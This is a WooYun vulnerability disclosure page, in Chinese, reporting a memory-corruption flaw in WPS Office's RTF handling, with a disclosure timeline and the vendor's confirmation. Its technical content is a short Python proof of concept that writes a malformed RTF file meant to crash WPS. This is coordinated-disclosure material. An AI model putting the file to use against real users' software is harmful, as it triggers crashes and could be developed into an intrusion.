漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2012-04-09: 细节已通知厂商并且等待厂商处理中
2012-04-13: 厂商已经确认,细节仅向厂商公开
2012-04-23: 细节向核心白帽子及相关领域专家公开
2012-05-03: 细节向普通白帽子公开
2012-05-13: 细节向实习白帽子公开
2012-05-24: 细节向公众公开
简要描述:
WPS处理畸形RTF文件时,流程错误,不当处理内存空间,造成字节覆盖,内存崩溃
详细说明:
#!/usr/bin/env python
print """
[+] Exploit Title: WPS rtf file handling memory corruption
[+] Date :4/29/2012
[+] Author: hellok(warptencq[dot]gmail.com)
[+] Software Link: www.wps.cn
[+] Version : <= WPS2012
[+] Tested : WIN7/XP
"""
filepath = "exploit.doc"
f = open(filepath, "wb+")
file = '\x7b\x5c\x72\x74\x66\x5c\x70\x69\x63\x74\x7b'
f.write(file)
f.close()
print "Done.\nOpen exploit.doc"
漏洞证明:
修复方案:
你们更专业,祝WPS越办越好
版权声明:转载请注明来源 hellok@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2012-04-13 14:31
厂商回复:
感谢!
最新状态:
暂无